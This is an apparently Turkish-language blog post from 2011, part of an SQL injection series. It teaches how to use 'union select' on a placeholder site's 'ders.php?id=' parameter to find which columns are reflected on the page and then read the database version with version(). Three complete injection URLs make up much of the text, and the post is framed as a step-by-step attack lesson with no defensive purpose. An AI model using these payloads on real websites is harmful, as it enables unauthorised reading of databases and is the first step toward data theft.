Bir önceki yazıda "order by" komutunu göstermiş ve sitedeki table sayısının nasıl bulunacağını anlatmıştım. Bu yazıda "union select" komutuyla siteden bilgi okumaya ve version bulmaya çalışacağız. Diyelim ki order by komutuyla table sayısının 6 olduğunu bulduk o zaman örneğimize devam edelim:
orneksite.com/ders.php?id=5+union+select+1,2,3,4,5,6-- bu adrese girdiğimizde herhangi bir değişiklik olmadıysa panik yapmayın ve hemen id değerinin önüne "-" işareti koyalım. Yani;
orneksite.com/ders.php?id=-5+union+select+1,2,3,4,5,6-- şimdi siteye sayılır yansıdı.
Bundan sonra ne yapacağımız sitede kullanılan veritabanı versiyonuna göre değişir. O yüzden versiyonunu öğrenelim. Diyelim ki sayılardan 3 ekrana yansıdı. 3 sayısını kullanalım.Şöyle ki;
orneksite.com/ders.php?id=-5+union+select+1,2,version(),4,5,6--
Versiyonu öğrendik. Gelecek yazıda buluşmak üzere..
7 Mayıs 2011 Cumartesi
Sql İnjection "Union Select" ve "Version()" Komutları
Gönderen Admin zaman: 13:06 Etiketler: Sql İnjection, sql injection data okuma, sql injection veri okuma, sql injection version bulma, union select, union select komutu
Kaydol:
Kayıt Yorumları (Atom)
0 yorum:
Yorum Gönder